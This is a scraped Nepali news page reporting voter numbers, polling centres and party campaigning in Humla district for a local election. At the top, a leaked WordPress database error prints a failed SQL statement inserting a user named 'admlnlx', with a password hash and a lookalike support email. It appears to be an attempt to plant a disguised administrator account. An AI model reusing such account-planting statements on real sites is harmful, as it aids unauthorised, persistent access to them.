WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1IttqA99YMw/dzVVQaXiHGONFkPDq1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 12:56:25', '', 'admlnlx', 'admlnlx')

हुम्लामा २४ हजारभन्दा बढी मतदाता, ५२ मतदानस्थल – Gaule Khabar

हुम्लामा २४ हजारभन्दा बढी मतदाता, ५२ मतदानस्थल

हुम्लामा २४ हजारभन्दा बढी मतदाता, ५२ मतदानस्थल

कचहरी डट कम हुम्ला ।। जिल्ला हुम्लामा स्थानीय चुनावका लागि २४ हजारभन्दा बढी मतदाताहरु रहेको छ ।

सात गाउँपालिकाको ४४ वडाहरुका लागि करीब चार दर्जनभन्दा धेरै मतदान केन्द्रहरु रहेको छ । यो स्थानीय निर्वाचनका लागि १२ हजार ६ सय ९६ पुरुष र ११ हजार ८ सय ६६ महिला गरी २४ हजार ५ सय ६२ जना मतदाता रहेको जानकारी जिल्ला निर्वाचन कार्यालय स्रोतबाट प्राप्त भएको छ ।

हुम्लामा स्थानीय चुनावका लागि नेपाली काँग्रेस, नेकपा माओवादी केन्द्र र नेकपा एमाले लगायतका दलहरुले गाँउ गाउँमा अभियान र घर घरमा घरदैलो कार्यक्रम सञ्चालन गरेका छन् । यसबाट दिनप्रति दिन चुनावको वातावरण तातिदैं गएको नेकपा माओवादी केन्द्रका केन्द्रीय आयोजक कमिटी सदस्य वर्ष बहादुर शाहीले बताए ।

हुम्लामा सात जना गाउँपालिका प्रमुख, सात जना उपप्रमुख, ४४ वडा अध्यक्ष र १सय ७६ जना सदस्यहरुका गरी २ सय ७४ जना स्थानीय प्रतिनिधिहरुका लागि करीब एक हजार पाँच सय जनाले चुनावमा भाग लिने विभिन्न स्रोतका आधारमा जानकारी प्राप्त भएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका